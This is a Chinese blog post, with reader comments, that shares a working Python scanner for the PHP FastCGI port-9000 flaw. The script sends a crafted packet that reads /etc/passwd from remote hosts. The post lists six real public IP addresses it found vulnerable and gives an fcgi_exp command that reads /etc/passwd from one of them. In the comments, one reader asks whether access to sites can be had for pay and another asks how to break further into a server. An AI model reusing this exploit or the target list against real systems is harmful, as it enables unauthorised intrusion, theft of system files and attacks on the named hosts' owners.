fastcgi文件读取漏洞python扫描脚本

fastcgi文件读取（代码执行）是个很老的漏洞，漏洞描述： PHP FastCGI 的远程利用

利用该漏洞可读取系统文件，甚至有一定几率成功执行代码。下载上述文章中提到的： fcgi_exp

协议细节其实我已不关心，只需要一个python的扫描脚本。于是拿wireshark抓了下GaRY的程序，写一小段代码。

外网暴露9000端口的机器自然是非常非常少的，但内网可就说不定了。

import socket
import sys

def test_fastcgi(ip):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM); sock.settimeout(5.0)
    sock.connect((ip, 9000))
    data = """
    01 01 00 01 00 08 00 00  00 01 00 00 00 00 00 00
    01 04 00 01 00 8f 01 00  0e 03 52 45 51 55 45 53 
    54 5f 4d 45 54 48 4f 44  47 45 54 0f 08 53 45 52 
    56 45 52 5f 50 52 4f 54  4f 43 4f 4c 48 54 54 50 
    2f 31 2e 31 0d 01 44 4f  43 55 4d 45 4e 54 5f 52
    4f 4f 54 2f 0b 09 52 45  4d 4f 54 45 5f 41 44 44
    52 31 32 37 2e 30 2e 30  2e 31 0f 0b 53 43 52 49 
    50 54 5f 46 49 4c 45 4e  41 4d 45 2f 65 74 63 2f 
    70 61 73 73 77 64 0f 10  53 45 52 56 45 52 5f 53
    4f 46 54 57 41 52 45 67  6f 20 2f 20 66 63 67 69
    63 6c 69 65 6e 74 20 00  01 04 00 01 00 00 00 00
    """
    data_s = ''
    for _ in data.split():
        data_s += chr(int(_,16))
    sock.send(data_s)
    try:
        ret = sock.recv(1024)
        if ret.find(':root:') > 0:
            print ret
            print '%s is vulnerable!' % ip
            return True
        else:
            return False
    except Exception, e:
        pass
            
    sock.close()


if __name__ == '__main__':
    if len(sys.argv) == 1:
        print sys.argv[0], '[ip]'
    else:
        test_fastcgi(sys.argv[1])

通过快速扫描9000端口，可以发现几个存在漏洞的机器：

110.164.68.137  is vul !
110.164.68.148  is vul !
110.164.68.149  is vul !
110.164.68.151  is vul !
110.164.68.154  is vul !
110.164.68.155  is vul !

fcgi_exp.exe read 110.164.68.137 9000 /etc/passwd

《fastcgi文件读取漏洞python扫描脚本》上有14条评论

delphy说道：

2015 年 6 月 15 日 10:48

fcgi_exp.exe运行不了

回复
1. 李劼杰说道：
  
  2015 年 6 月 15 日 11:48
  
  有什么错误提示？你试试下载wooyun上百度网盘那个，看看是否正常。
  
  回复
  1. _Evil说道：
    
    2015 年 6 月 18 日 11:18
    
    他木有装go语言环境吧
    
    回复
wonderkun说道：

2015 年 6 月 28 日 01:11

学长，你好啊。我也是西北工业大学的，现在是大二，大一的时候也是用你的猫上网的，终于找到学长的博客了。仰慕学长已久，很想知道学长的猫是怎么写的，求指点啊。

回复
dev说道：

2015 年 6 月 28 日 08:08

err: WSARecv tcp 192.168.0.5:59437: The specified network name is no longer available. 什么问题

回复
ddd说道：

2015 年 7 月 8 日 12:57

少了import socket..

回复
乐乐说道：

2015 年 8 月 7 日 23:31

李姐姐 C:>fastcgi_exp.py 10.10.10.194Traceback (most recent call last): File “C:fastcgi_exp.py”, line 42, in test_fastcgi(sys.argv ) File “C:fastcgi_exp.py”, line 6, in test_fastcgi sock.connect((ip, 9000)) File “D:Python27libsocket.py”, line 224, in meth return getattr(self._sock,name)(*args)socket.timeout: timed out这个是缺少了啥环境？求告知

回复
0xLucifer说道：

2015 年 8 月 17 日 14:20

jiejie真棒

回复
丁健说道：

2015 年 8 月 26 日 13:17

能拿站权限吗有报酬

回复
全职法师说道：

2015 年 8 月 27 日 18:33

回复
whynot说道：

2015 年 9 月 12 日 21:17

原来以为是姐姐、、、小菜转载膜拜了

回复
delphy说道：

2016 年 3 月 10 日 10:20

李姐姐，加入发现一个网站有任意文件读取漏洞，可以从哪些方面着手去突破这个服务器，能读取/etc/passwd,/etc/hosts这些文件，但是网站的存储目录不知道，读不出源代码，能否指教一下

回复
Pingback： pwbhub之名字还在起《迷writeup》 – IceMatcha's Blog
Pingback：关于HHVM配置安全问题 – Tim's blog

《fastcgi文件读取漏洞python扫描脚本》上有14条评论

发表回复 取消回复

发表回复取消回复